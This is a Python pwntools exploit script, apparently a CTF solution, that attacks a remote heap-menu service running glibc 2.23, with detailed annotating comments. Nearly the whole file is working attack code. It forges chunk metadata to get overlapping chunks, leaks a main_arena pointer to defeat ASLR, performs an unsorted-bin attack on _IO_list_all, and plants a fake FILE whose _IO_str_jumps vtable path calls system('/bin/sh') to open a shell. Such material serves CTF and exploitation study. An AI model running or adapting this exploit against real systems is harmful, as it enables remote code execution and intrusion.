| from pwn import *
# Session with the challenge service and the libc build every offset below is
# computed against.  The exploit is specific to glibc 2.23: that release still
# lacks the stdio vtable validation added in 2.24, which is the mitigation that
# breaks the fake-FILE approach used further down.
sh = remote('node3.buuoj.cn', 29184)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

# Unrelocated (image-relative) offsets; each becomes an absolute address only
# after libc_base has been recovered from the heap leak.
malloc_hook_s = libc.sym['__malloc_hook']
_IO_list_all_s = libc.sym['_IO_list_all']
system_s = libc.sym['system']
# First occurrence of the "/bin/sh" string inside the libc image.
binsh_s = next(libc.search('/bin/sh'))
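def get_IO_str_jumps():
    """Locate the image-relative offset of the unexported ``_IO_str_jumps`` vtable.

    ``_IO_str_jumps`` carries no dynamic symbol, so it is found indirectly:
    every 8-byte little-endian occurrence of ``_IO_str_underflow`` in the
    image is treated as a possible vtable slot, and the table start is taken
    to be 0x20 bytes before that slot (the position of the ``underflow``
    entry in ``_IO_jump_t``).  The first candidate that lies past
    ``_IO_file_jumps`` is accepted; this relies on the string vtable being
    laid out after the file vtable in this libc build.

    Returns:
        int: offset of ``_IO_str_jumps`` relative to the libc image base.
            The value is also printed, as in the original script.

    Raises:
        LookupError: if no reference to ``_IO_str_underflow`` is found past
            ``_IO_file_jumps``.  The original fell off the end and returned
            ``None``, which only surfaced later as a TypeError when the
            caller added it to ``libc_base``.
    """
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # Function-call form prints the same single value under Python 2.
            print(possible_IO_str_jumps_offset)
            return possible_IO_str_jumps_offset
    raise LookupError(
        'get_IO_str_jumps: no _IO_str_underflow reference found past _IO_file_jumps'
    )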
def add(index,size,content):
    """Drive menu option 1 (allocate) on the remote service.

    Answers the index and size prompts line by line, then delivers
    ``content`` with ``sendafter`` so no trailing newline is appended to the
    payload bytes.
    """
    replies = (
        ('>>', '1'),
        ('Index:', str(index)),
        ('Size:', str(size)),
    )
    for prompt, reply in replies:
        sh.sendlineafter(prompt, reply)
    sh.sendafter('Content:', content)
def edit(index,content):
    """Drive menu option 2 (edit): pick slot ``index`` and overwrite its content.

    ``content`` is sent without a newline, so the exact bytes given are
    written into the slot.
    """
    for prompt, reply in (('>>', '2'), ('Index:', str(index))):
        sh.sendlineafter(prompt, reply)
    sh.sendafter('Content:', content)
def show(index):
    """Drive menu option 3 (show) for slot ``index``.

    Only the request is sent; reading the service's reply is left to the
    caller.
    """
    for prompt, reply in (('>>', '3'), ('Index:', str(index))):
        sh.sendlineafter(prompt, reply)
def delete(index):
    """Drive menu option 4 (delete): free the slot at ``index``."""
    for prompt, reply in (('>>', '4'), ('Index:', str(index))):
        sh.sendlineafter(prompt, reply)
# Initial heap layout.  NOTE(review): requests of 0xF0 and 0xF8 presumably both
# round up to a 0x100-byte chunk under glibc's 16-byte rounding, giving three
# equal chunks back to back; the trailing 0x10 allocation looks like a guard
# that keeps slot 2 from bordering the top chunk -- confirm against the
# binary's allocation sizes.
add(0,0xF0,'a')
add(1,0xF8,'b')
add(2,0xF0,'c')
add(3,0x10,'d')
# Free slot 0.  A 0x100 chunk is above the default fastbin limit, so it goes to
# the unsorted bin, where its fd/bk point into main_arena -- the pointers the
# leak below reads back.
delete(0)
# Write 0xF8 bytes into slot 1: 0xF0 filler followed by one qword (0x200 = the
# combined size of chunks 0 and 1) that lands on the header area of chunk 2.
# NOTE(review): on its own this only reaches chunk 2's prev_size field; the
# script presumably depends on an off-by-one in the program's edit routine
# (a NUL byte clearing chunk 2's PREV_INUSE bit) that is not visible here.
edit(1,'d'*0xF0 + p64(0x100 + 0x100))
# With prev_size forged, freeing chunk 2 consolidates backwards over the still
# allocated chunk 1, producing one large free chunk that overlaps it.
delete(2)
# Carve 0x100 off the front of the merged chunk so the free remainder now
# starts inside slot 1's user data.
add(0,0xF0,'a')
# Information disclosure: slot 1 prints the remainder's fd/bk, i.e. an address
# inside main_arena (main_arena+88 for this bin, hence the name).  Without this
# leak none of the absolute addresses below could be computed under ASLR.
show(1)
sh.recvuntil('content: ')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
# Page-mask the leak and splice in the low 12 bits of __malloc_hook.
# NOTE(review): this only works when main_arena+88 and __malloc_hook share a
# 4 KiB page; presumably true for this libc build, but it is a build-specific
# assumption rather than a general one.
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
# Relocate the remaining symbols against the recovered base.
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
_IO_list_all_addr = libc_base + _IO_list_all_s
_IO_str_jumps_addr = libc_base + get_IO_str_jumps()
# Python 2 print statements (the whole script targets Python 2 / pwntools 2).
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'system_addr=',hex(system_addr)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)
# Free slot 0 again (it merges with the free remainder behind it) and take a
# 0x100 request back out; the remainder's header now sits at the very start of
# slot 1's user data, so the next edit of slot 1 overwrites it.
delete(0)
add(0,0x100,'a')
# Fake _IO_FILE overlaid on the free chunk (House of Orange style FSOP).
# The first two qwords double as the chunk header: prev_size / _flags = 0 and
# size / _IO_read_ptr = 0x60 -- the same size the trigger below requests.
fake_file = p64(0) + p64(0x60)
# fd = 0, bk = _IO_list_all - 0x10.  NOTE(review): presumably an unsorted-bin
# attack -- unlinking this chunk writes a main_arena address into _IO_list_all;
# glibc 2.23 has no integrity check on bk here.
fake_file += p64(0) + p64(_IO_list_all_addr - 0x10)
# _IO_write_base = 0, _IO_write_ptr = 1: write_ptr > write_base is the
# condition the stdio flush-all path checks before it calls the vtable.
fake_file += p64(0) + p64(1)
# _IO_write_end = 0, _IO_buf_base = address of "/bin/sh".
fake_file += p64(0) + p64(binsh_addr)
# Zero-fill up to the vtable pointer at offset 0xD8.
fake_file = fake_file.ljust(0xD8,'\x00')
# vtable = _IO_str_jumps - 8, so the overflow slot resolves to the neighbouring
# _IO_str_finish entry.  _IO_str_jumps lives in libc's own vtable section,
# which is why this variant survives the vtable validation newer glibc adds.
fake_file += p64(_IO_str_jumps_addr - 8)
# _IO_strfile callbacks after the FILE: _allocate_buffer = 0, _free_buffer =
# system, invoked with _IO_buf_base as its argument.  NOTE(review): later glibc
# replaced these function pointers with direct malloc/free calls, which closes
# this variant -- confirm the exact version when porting.
fake_file += p64(0) + p64(system_addr)
# Overwrite the free chunk (and the fake FILE) through the overlapping slot 1.
edit(1,fake_file)
# Trigger: menu option 1 is driven by hand instead of via add() because the
# service presumably never reaches the 'Content:' prompt -- the 0x60 request
# walks the corrupted unsorted bin, glibc's integrity check aborts, and abort's
# stdio flush walks the now-corrupted _IO_list_all chain into the fake FILE.
# NOTE(review): index 7 may be outside the program's slot table; cannot tell
# from this script whether that matters.
sh.sendlineafter('>>','1')
sh.sendlineafter('Index:','7')
sh.sendlineafter('Size:',str(0x60))
# Hand the session over to the user.
sh.interactive()